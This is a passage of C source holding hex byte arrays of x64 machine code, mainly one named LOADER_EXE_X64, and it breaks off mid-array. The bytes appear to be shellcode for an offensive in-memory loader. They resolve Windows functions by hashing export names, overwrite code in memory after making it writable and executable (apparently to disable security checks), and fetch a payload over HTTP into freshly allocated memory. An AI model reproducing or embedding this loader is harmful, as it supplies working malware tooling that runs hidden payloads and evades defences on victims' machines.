859 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8, 0xfd, 0x00, 0x00, 0x00, 0x85,
860 0xc0, 0x75, 0xe6, 0x45, 0x85, 0xc9, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00,
861 0x48, 0x8b, 0x4d, 0xe8, 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04,
862 0x0a, 0x88, 0x01, 0x48, 0x03, 0xce, 0x45, 0x03, 0xce, 0x75, 0xf3, 0xe9,
863 0x87, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x44, 0x33, 0xce, 0x45,
864 0x2b, 0xd1, 0x44, 0x8b, 0xce, 0x41, 0xc1, 0xe2, 0x08, 0x44, 0x0f, 0xb6,
865 0x19, 0x41, 0x81, 0xc3, 0x00, 0xfe, 0xff, 0xff, 0x45, 0x03, 0xda, 0x48,
866 0x03, 0xce, 0x48, 0x89, 0x4d, 0xe0, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xa5,
867 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8,
868 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x41, 0x81, 0xfb, 0x00,
869 0x7d, 0x00, 0x00, 0x41, 0x8d, 0x41, 0x01, 0x41, 0x0f, 0x42, 0xc1, 0x41,
870 0x81, 0xfb, 0x00, 0x05, 0x00, 0x00, 0x8d, 0x48, 0x01, 0x0f, 0x42, 0xc8,
871 0x41, 0x81, 0xfb, 0x80, 0x00, 0x00, 0x00, 0x44, 0x8d, 0x41, 0x02, 0x44,
872 0x0f, 0x43, 0xc1, 0x45, 0x85, 0xc0, 0x74, 0x1b, 0x48, 0x8b, 0x4d, 0xe8,
873 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04, 0x0a, 0x88, 0x01, 0x48,
874 0x03, 0xce, 0x45, 0x03, 0xc6, 0x75, 0xf3, 0x48, 0x89, 0x4d, 0xe8, 0x44,
875 0x8b, 0xce, 0xeb, 0x1d, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x4d, 0xe8,
876 0x8a, 0x02, 0x88, 0x01, 0x48, 0x03, 0xce, 0x48, 0x03, 0xd6, 0x48, 0x89,
877 0x4d, 0xe8, 0x48, 0x89, 0x55, 0xe0, 0x45, 0x33, 0xc9, 0x85, 0xff, 0x0f,
878 0x84, 0x20, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x74, 0x24,
879 0x58, 0x2b, 0xc3, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24,
880 0x60, 0x4c, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3,
881 0x8b, 0x51, 0x14, 0x4c, 0x8b, 0xc1, 0x8d, 0x42, 0xff, 0x89, 0x41, 0x14,
882 0x85, 0xd2, 0x75, 0x17, 0x48, 0x8b, 0x01, 0x0f, 0xb6, 0x10, 0x48, 0xff,
883 0xc0, 0x48, 0x89, 0x01, 0x8b, 0xc2, 0xc7, 0x41, 0x14, 0x07, 0x00, 0x00,
884 0x00, 0xeb, 0x03, 0x8b, 0x41, 0x10, 0x8d, 0x0c, 0x00, 0xc1, 0xe8, 0x07,
885 0x83, 0xe0, 0x01, 0x41, 0x89, 0x48, 0x10, 0xc3, 0x4c, 0x8b, 0xc9, 0x45,
886 0x85, 0xc0, 0x74, 0x13, 0x48, 0x2b, 0xd1, 0x42, 0x8a, 0x04, 0x0a, 0x41,
887 0x88, 0x01, 0x49, 0xff, 0xc1, 0x41, 0x83, 0xc0, 0xff, 0x75, 0xf0, 0x48,
888 0x8b, 0xc1, 0xc3, 0xcc, 0x48, 0x89, 0x7c, 0x24, 0x08, 0x4c, 0x8b, 0xc9,
889 0x8a, 0xc2, 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xc8, 0xf3, 0xaa, 0x48, 0x8b,
890 0x7c, 0x24, 0x08, 0x49, 0x8b, 0xc1, 0xc3, 0xcc, 0xeb, 0x0f, 0x80, 0x3a,
891 0x00, 0x74, 0x10, 0x3a, 0x02, 0x75, 0x0c, 0x48, 0xff, 0xc1, 0x48, 0xff,
892 0xc2, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xeb, 0x0f, 0xbe, 0x01, 0x0f, 0xbe,
893 0x0a, 0x2b, 0xc1, 0xc3};
894
0
1 unsigned char LOADER_EXE_X64[] = {
2 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
3 0x74, 0x24, 0x18, 0x57, 0x48, 0x81, 0xec, 0x00, 0x05, 0x00, 0x00, 0x33,
4 0xff, 0x48, 0x8b, 0xd9, 0x48, 0x39, 0xb9, 0x38, 0x02, 0x00, 0x00, 0x0f,
5 0x84, 0xc0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0x91,
6 0x88, 0x00, 0x00, 0x00, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0x48, 0x85, 0xc0,
7 0x0f, 0x84, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c, 0x24, 0x28, 0x4c,
8 0x8d, 0x05, 0x26, 0x11, 0x00, 0x00, 0x21, 0x7c, 0x24, 0x20, 0x4c, 0x8b,
9 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b, 0x43, 0x28, 0x48,
10 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xf8,
11 0xe8, 0x83, 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb,
12 0x48, 0x8b, 0x93, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xe8, 0xe8, 0x6d,
13 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b,
14 0x93, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8, 0x57, 0x23, 0x00,
15 0x00, 0x48, 0x85, 0xed, 0x74, 0x4c, 0x48, 0x85, 0xf6, 0x74, 0x47, 0x48,
16 0x85, 0xc0, 0x74, 0x42, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00, 0x10, 0x00,
17 0xff, 0xd0, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30, 0xff, 0xd6,
18 0x48, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x30,
19 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x33, 0xd2, 0x48,
20 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0xff, 0xd5, 0xeb, 0x0b, 0x48,
21 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x86, 0x10, 0x00, 0x00, 0x48, 0x8b,
22 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05, 0x00, 0x00, 0x49, 0x8b, 0x5b,
23 0x10, 0x49, 0x8b, 0x6b, 0x18, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b, 0xe3,
24 0x5f, 0xc3, 0xcc, 0xcc, 0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3,
25 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0x4d, 0x85, 0xc0, 0x75,
26 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b, 0x49, 0x10, 0x49,
27 0x8b, 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x49,
28 0x8b, 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
29 0x49, 0x8b, 0x81, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x17,
30 0x49, 0x8b, 0x81, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
31 0x0a, 0x49, 0x89, 0x08, 0xf0, 0xff, 0x41, 0x08, 0x33, 0xc0, 0xc3, 0x49,
32 0x83, 0x20, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc,
33 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x08, 0xff, 0xc8, 0xc3, 0xcc,
34 0x33, 0xc0, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c,
35 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20,
36 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xe8, 0x48, 0x8b, 0xf1, 0x41, 0xf6, 0xc0,
37 0x02, 0x74, 0x1b, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x85, 0xdb, 0x74,
38 0x1c, 0x48, 0x8b, 0x49, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48,
39 0x8b, 0x46, 0x38, 0x48, 0x89, 0x03, 0x40, 0xf6, 0xc5, 0x01, 0x74, 0x1c,
40 0x48, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x12,
41 0x48, 0x8d, 0x5e, 0x28, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcb, 0xff, 0x50,
42 0x08, 0x48, 0x89, 0x1f, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48,
43 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83, 0xc4,
44 0x20, 0x5f, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
45 0x41, 0x58, 0x48, 0x8b, 0xda, 0xff, 0x50, 0x78, 0x89, 0x03, 0x33, 0xc0,
46 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53,
47 0x48, 0x83, 0xec, 0x60, 0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8,
48 0x83, 0x60, 0x18, 0x00, 0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33,
49 0xd2, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2a, 0x27, 0x00, 0x00, 0x48, 0x8b,
50 0x03, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18,
51 0x85, 0xc0, 0x75, 0x1e, 0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78,
52 0x4c, 0x8d, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48,
53 0x8d, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0xff, 0x50, 0x20, 0x33, 0xc0,
54 0x48, 0x83, 0xc4, 0x60, 0x5b, 0xc3, 0xcc, 0xcc, 0x4d, 0x8b, 0xc8, 0x4d,
55 0x85, 0xc0, 0x75, 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b,
56 0x41, 0x58, 0x49, 0x8b, 0x80, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02,
57 0x75, 0x0d, 0x49, 0x8b, 0x80, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42,
58 0x08, 0x74, 0x19, 0x49, 0x8b, 0x80, 0xa4, 0x06, 0x00, 0x00, 0x48, 0x3b,
59 0x02, 0x75, 0x16, 0x49, 0x8b, 0x80, 0xac, 0x06, 0x00, 0x00, 0x48, 0x3b,
60 0x42, 0x08, 0x75, 0x09, 0x49, 0x89, 0x09, 0xf0, 0xff, 0x41, 0x08, 0xeb,
61 0x24, 0x49, 0x8b, 0x80, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75,
62 0x1b, 0x49, 0x8b, 0x80, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08,
63 0x75, 0x0e, 0x48, 0x8d, 0x41, 0x10, 0x49, 0x89, 0x01, 0xf0, 0xff, 0x41,
64 0x18, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00,
65 0x80, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0x44, 0x24, 0x30, 0x83, 0x20, 0x00,
66 0x33, 0xc0, 0xc3, 0xcc, 0x0f, 0xaf, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc,
67 0x48, 0x8b, 0x44, 0x24, 0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc,
68 0x8d, 0x04, 0x11, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57,
69 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xd9, 0x48,
70 0x81, 0xc1, 0x58, 0x03, 0x00, 0x00, 0xff, 0x53, 0x30, 0x48, 0x8b, 0xf0,
71 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xd7,
72 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0xc0, 0x05, 0x00, 0x00, 0x48, 0x8b,
73 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84,
74 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x99, 0xff, 0xff, 0xff, 0x4c,
75 0x8d, 0x3d, 0x86, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xff, 0x0f, 0x88, 0xa5,
76 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8,
77 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53,
78 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7,
79 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0xa1, 0x25, 0x00, 0x00, 0x44,
80 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6,
81 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d, 0x93, 0xd0, 0x05, 0x00,
82 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf0, 0x48, 0x85,
83 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x42, 0xff, 0xff, 0xff, 0x4c, 0x8d,
84 0x35, 0x2f, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e, 0x4c, 0x8d,
85 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x8b,
86 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74, 0x25, 0x44,
87 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0x25, 0x00,
88 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x8b,
89 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x21, 0xff, 0xff, 0xff,
90 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4, 0x20, 0x41,
91 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
92 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
93 0x48, 0x8b, 0xd9, 0x48, 0x81, 0xc1, 0x64, 0x03, 0x00, 0x00, 0xff, 0x53,
94 0x30, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00,
95 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x70, 0x05,
96 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48,
97 0x85, 0xc0, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x65,
98 0x1f, 0x00, 0x00, 0x4c, 0x8d, 0x3d, 0xf6, 0xfc, 0xff, 0xff, 0x41, 0x2b,
99 0xff, 0x0f, 0x88, 0xa5, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50,
100 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48,
101 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00,
102 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0x89,
103 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
104 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d,
105 0x93, 0x90, 0x05, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48,
106 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0xf2, 0x1e,
107 0x00, 0x00, 0x4c, 0x8d, 0x35, 0xdf, 0x1e, 0x00, 0x00, 0x41, 0x2b, 0xfe,
108 0x78, 0x3e, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40,
109 0x00, 0x00, 0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85,
110 0xc0, 0x74, 0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce,
111 0xe8, 0x27, 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
112 0x4c, 0x24, 0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9,
113 0x21, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48,
114 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc,
115 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
116 0x57, 0x48, 0x8d, 0xac, 0x24, 0x48, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec,
117 0xb8, 0x02, 0x00, 0x00, 0x83, 0xa5, 0x08, 0x02, 0x00, 0x00, 0x00, 0x48,
118 0x8b, 0xf9, 0x45, 0x33, 0xf6, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x33, 0xd2,
119 0xbe, 0x00, 0x02, 0x60, 0x84, 0x41, 0x8d, 0x5e, 0x68, 0x44, 0x8b, 0xc3,
120 0xe8, 0xdb, 0x23, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x89, 0x5c, 0x24,
121 0x40, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x8f, 0xe8, 0x06, 0x00,
122 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x48, 0x89,
123 0x45, 0x88, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x01, 0x00, 0x00,
124 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x89, 0x44, 0x24, 0x60, 0x89, 0x45,
125 0x90, 0xff, 0x97, 0xf0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x85, 0xc0, 0x0f,
126 0x84, 0x16, 0x02, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x54, 0x04, 0xb8, 0x00,
127 0x32, 0xe0, 0x84, 0x44, 0x8b, 0xe3, 0x89, 0x5c, 0x24, 0x20, 0x41, 0x0f,
128 0x94, 0xc4, 0x0f, 0x44, 0xf0, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x33,
129 0xd2, 0x33, 0xc9, 0xff, 0x97, 0xf8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8,
130 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x01, 0x00, 0x00, 0x44, 0x0f, 0xb7,
131 0x44, 0x24, 0x64, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x89, 0x5c, 0x24, 0x38,
132 0x45, 0x33, 0xc9, 0x89, 0x5c, 0x24, 0x30, 0x48, 0x8b, 0xc8, 0xc7, 0x44,
133 0x24, 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff,
134 0x97, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f,
135 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x38, 0x48, 0x8d,
136 0x97, 0xe8, 0x07, 0x00, 0x00, 0x89, 0x74, 0x24, 0x30, 0x4c, 0x8d, 0x85,
137 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x28, 0x45, 0x33, 0xc9,
138 0x48, 0x8b, 0xc8, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff, 0x97, 0x20, 0x01,
139 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x0f, 0x01,
140 0x00, 0x00, 0x45, 0x85, 0xe4, 0x74, 0x28, 0x0f, 0xba, 0xe6, 0x0c, 0x73,
141 0x22, 0x45, 0x8d, 0x4e, 0x04, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x80,
142 0x33, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
143 0xc8, 0x41, 0x8d, 0x56, 0x1f, 0xff, 0x97, 0x08, 0x01, 0x00, 0x00, 0x45,
144 0x33, 0xe4, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x44, 0x89, 0x64, 0x24,
145 0x20, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x28, 0x01, 0x00, 0x00,
146 0x85, 0xc0, 0x0f, 0x84, 0xb8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x8d, 0x00,
147 0x02, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
148 0x00, 0x4c, 0x8d, 0x85, 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24,
149 0x20, 0xba, 0x13, 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30,
150 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00, 0x81,
151 0xbd, 0x08, 0x02, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x79, 0x48,
152 0x8d, 0xb7, 0x18, 0x09, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00,
153 0x08, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xc6, 0x4c, 0x89, 0x26, 0x4c, 0x8d,
154 0x8d, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24, 0x20, 0xba, 0x05,
155 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30, 0x01, 0x00, 0x00,
156 0x85, 0xc0, 0x74, 0x44, 0x48, 0x8b, 0x16, 0x48, 0x85, 0xd2, 0x74, 0x3c,
157 0x33, 0xc9, 0x45, 0x8d, 0x4c, 0x24, 0x04, 0x41, 0xb8, 0x00, 0x30, 0x00,
158 0x00, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x20, 0x09, 0x00, 0x00, 0x48,
159 0x85, 0xc0, 0x74, 0x20, 0x44, 0x8b, 0x06, 0x4c, 0x8d, 0x8d, 0x18, 0x02,
160 0x00, 0x00, 0x48, 0x8b, 0xd0, 0x44, 0x89, 0xa5, 0x18, 0x02, 0x00, 0x00,
161 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x10, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xf0,
162 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcf,
163 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcd, 0xff, 0x97, 0x18,
164 0x01, 0x00, 0x00, 0x45, 0x85, 0xf6, 0x74, 0x46, 0x83, 0xbf, 0x34, 0x02,
165 0x00, 0x00, 0x03, 0x75, 0x3d, 0x48, 0x8b, 0x9f, 0x20, 0x09, 0x00, 0x00,
166 0x48, 0x8d, 0x97, 0x08, 0x09, 0x00, 0x00, 0x44, 0x8b, 0x8f, 0x18, 0x09,
167 0x00, 0x00, 0x48, 0x8d, 0x8f, 0xf8, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xc3,
168 0xe8, 0xe3, 0x1d, 0x00, 0x00, 0x48, 0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f,
169 0xf0, 0x07, 0x00, 0x00, 0xe8, 0x8b, 0x1c, 0x00, 0x00, 0x48, 0x3b, 0x83,
170 0x18, 0x05, 0x00, 0x00, 0x75, 0x05, 0x41, 0x8b, 0xc6, 0xeb, 0x02, 0x33,
171 0xc0, 0x48, 0x81, 0xc4, 0xb8, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
172 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
173 0x48, 0x89, 0x5c, 0x24, 0x08, 0x4c, 0x89, 0x44, 0x24, 0x18, 0x55, 0x56,
174 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac,
175 0x24, 0xf0, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00,
176 0x4c, 0x63, 0x7a, 0x3c, 0x4d, 0x8b, 0xe9, 0x48, 0x8b, 0xda, 0x4c, 0x8b,
177 0xe1, 0x41, 0x8b, 0x84, 0x17, 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f,
178 0x84, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3c, 0x02, 0x8b, 0x77, 0x18,
179 0x85, 0xf6, 0x0f, 0x84, 0x86, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33,
180 0xc9, 0x44, 0x8b, 0x47, 0x0c, 0x48, 0x03, 0xc2, 0x48, 0x89, 0x44, 0x24,
181 0x30, 0x4c, 0x03, 0xc2, 0x8b, 0x47, 0x20, 0x48, 0x03, 0xc2, 0x48, 0x89,
182 0x85, 0x58, 0x01, 0x00, 0x00, 0x8b, 0x47, 0x24, 0x48, 0x03, 0xc2, 0x48,
183 0x89, 0x44, 0x24, 0x28, 0x41, 0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33,
184 0xd2, 0xff, 0xc1, 0x0c, 0x20, 0x88, 0x44, 0x15, 0x00, 0x8b, 0xd1, 0x42,
185 0x8a, 0x04, 0x01, 0x84, 0xc0, 0x75, 0xee, 0xc6, 0x44, 0x0d, 0x00, 0x00,
186 0x49, 0x8b, 0xd5, 0x48, 0x8d, 0x4d, 0x00, 0xe8, 0xbc, 0x1b, 0x00, 0x00,
187 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
188 0xff, 0xce, 0x49, 0x8b, 0xd5, 0x8b, 0x0c, 0xb0, 0x48, 0x03, 0xcb, 0xe8,
189 0xa0, 0x1b, 0x00, 0x00, 0x48, 0x33, 0x44, 0x24, 0x20, 0x48, 0x3b, 0x85,
190 0x60, 0x01, 0x00, 0x00, 0x74, 0x21, 0x85, 0xf6, 0x75, 0xd7, 0x33, 0xc0,
191 0x48, 0x8b, 0x9c, 0x24, 0x50, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x10,
192 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
